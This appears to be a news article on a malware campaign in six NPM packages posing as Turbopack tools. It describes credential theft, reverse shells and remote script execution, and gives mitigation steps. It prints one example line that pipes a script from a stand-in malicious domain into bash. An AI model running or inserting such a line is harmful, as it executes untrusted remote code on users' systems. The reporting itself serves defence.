ART & CULTURE

Developers Beware: Malicious Code Found in Widely-Used NPM Packages—Act Now

Published

4 weeks ago

on

Six widely-used NPM packages compromised with malware targeting developer environments, prompting urgent warnings for JavaScript and Node.js communities.

Malware Injected into Six NPM Packages in Major Open-Source Supply Chain Breach

By El Ouchen, International Cybersecurity Correspondent
July 20, 2025

In a stark reminder of the fragility of the global software supply chain, security researchers have uncovered a malware campaign embedded in six NPM packages, affecting thousands of developers and potentially compromising enterprise software worldwide. The packages were laced with malicious code designed to steal credentials, execute remote commands, and maintain persistent access to infected systems.

Discovered by the cybersecurity firm Checkmarx and first reported by The Hacker News, the campaign was traced to an attacker identified as “ClassicSpace”, who appears to have used social engineering and fake developer identities to introduce the malicious modules.

Affected Packages and Technical Breakdown

The malicious packages, now removed from the NPM registry, include:

  • turbopack-cli
  • turbopack-core
  • turbo-install-global
  • turbo-module
  • turbopack-util
  • turbopack-bin

These packages masqueraded as legitimate developer tools for managing JavaScript or TurboPack-based projects.

How the Malware Works:

  1. Once installed, the packages downloaded obfuscated JavaScript from remote servers.
  2. The payload initiated reverse shell connections, enabling attackers to run commands on infected machines.
  3. Additional modules retrieved via curl were saved and executed with chmod +x permissions, allowing privilege escalation.
  4. Sensitive environment variables and tokens were exfiltrated to attacker-controlled domains via HTTP POST requests.

Example of a malicious payload:

javascript

const exec = require('child_process').exec;
exec('curl -s http://malicious-domain.com/payload.sh | bash');

Some packages even mimicked Next.js’s “Turbopack” ecosystem, a popular Webpack alternative, to deceive developers.

Human and Industry Impact

Thousands of developers globally—including those working on enterprise applications—may have unknowingly introduced the malware into CI/CD pipelines, internal development environments, or production builds. This elevates the risk from mere infection to deep systemic compromise.

“This is a textbook case of a supply chain attack—what makes it terrifying is how trusted ecosystems like NPM can become silent attack vectors,” said Hila Cohen, a supply chain risk analyst at MITRE.

Organizations using automated dependency management tools like npm install or CI/CD systems without package verification are particularly vulnerable.

Response and Mitigation

NPM’s security team swiftly removed the compromised packages and issued public advisories. However, due to the popularity of automated installs and wide propagation, many systems remain exposed.

Recommended Actions:

  • Immediately remove and audit any of the six identified packages.
  • Scan logs for suspicious outbound connections to unrecognized domains.
  • Implement lockfiles (e.g., package-lock.json) to prevent silent dependency changes.
  • Use package integrity verification (npm audit, sigstore) and runtime monitoring.

Organizations are also urged to integrate Software Bill of Materials (SBOMs) into their DevSecOps practices to identify malicious components in the future.

Broader Significance

This incident mirrors high-profile breaches like SolarWinds and UAParser.js, reaffirming that open-source ecosystems, while powerful, are also soft targets for cybercriminals.

“Supply chain attacks are no longer theoretical—they are an operational reality,” said Asaf Karas, CTO of Checkmarx. “Developers must rethink trust in code, even when it comes from familiar registries.”

The campaign also emphasizes the need for global cooperation among package maintainers, security researchers, and platform vendors to ensure timely threat detection and response.

Conclusion

As the digital world leans heavily on open-source software, the exploitation of platforms like NPM becomes a high-value avenue for cyber attackers. This breach serves as a sobering warning: vigilance, transparency, and proactive tooling are not optional—they are foundational.

Related Topics:

Trending

Exit mobile version